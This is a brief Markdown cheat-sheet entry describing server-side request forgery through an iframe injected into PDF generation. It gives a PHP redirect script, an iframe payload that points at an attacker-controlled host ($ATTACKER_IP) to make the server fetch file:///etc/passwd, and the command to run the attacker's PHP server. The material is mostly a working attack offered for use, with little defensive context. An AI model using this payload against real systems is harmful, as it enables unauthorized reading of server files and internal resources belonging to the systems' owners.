23 lines
529 B
Markdown
23 lines
529 B
Markdown
# SSRF through iframe
|
|
|
|
* [taken from Jomar's Website](https://www.jomar.fr/posts/2021/ssrf_through_pdf_generation/)
|
|
* Upload iframe with attacker server and php code ready to be executed. Redirect to a local file on the server
|
|
```php
|
|
<?php
|
|
$loc = "http://127.0.0.1/";
|
|
|
|
if(isset($_GET['a'])){
|
|
$loc = $_GET['a'];
|
|
}
|
|
header('Location: '.$loc);
|
|
?>
|
|
```
|
|
* Payload looks like this
|
|
```html
|
|
<iframe src="http://$ATTACKER_IP:4711/ssrf.php?a=file:///etc/passwd"/>
|
|
```
|
|
* Start a php adhoc server and run it
|
|
```php
|
|
php -S 0.0.0.0:4711
|
|
```
|